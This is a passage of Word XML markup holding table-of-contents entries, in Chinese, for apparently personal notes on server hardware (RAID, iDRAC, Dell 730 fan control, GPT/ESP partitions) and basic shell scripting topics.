              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779628 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D0BCD21" w14:textId="25ABE722" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779629" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>显卡压力测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779629 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78C956F5" w14:textId="2AAE8661" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779630" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>组装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RAID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779630 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F19EB77" w14:textId="54C8DEE1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779631" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IDRAC (IPMI)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779631 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="006B14D1" w14:textId="48EE6998" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779632" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GPT</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分区必须有</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ESP(efi)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779632 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="270A4E93" w14:textId="2B57D030" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779633" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>案例：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dell 730</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风扇速度调整</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779633 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51751D2B" w14:textId="74626636" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779634" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装操作系统学习</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779634 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14ECCFB5" w14:textId="0E77BDB3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779635" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779635 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BE8FCB6" w14:textId="7BD429F3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779636" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>换行相关的操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779636 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1433C788" w14:textId="1B80B143" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779637" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>字符串注意事项</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779637 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="217A7816" w14:textId="4050C0A3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779638" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>每两秒看</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>卡信息：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>watch</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779638 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="725DA900" w14:textId="10623526" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779639" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779639 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E294A02" w14:textId="3FCF36A3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779640" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>给脚本传参</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779640 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>134</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6108DC82" w14:textId="440625FB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779641" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>遍历文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779641 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C004065" w14:textId="3A9C7A2B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779642" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>遍历数组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779642 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20B31C04" w14:textId="428D045E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779643" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>格式化输出日期</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779643 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12467735" w14:textId="576D51B1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779644" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>判断目录下文件还是目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779644 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3457F71C" w14:textId="258077F4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779645" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>批量</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git clone</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>仓库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779645 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
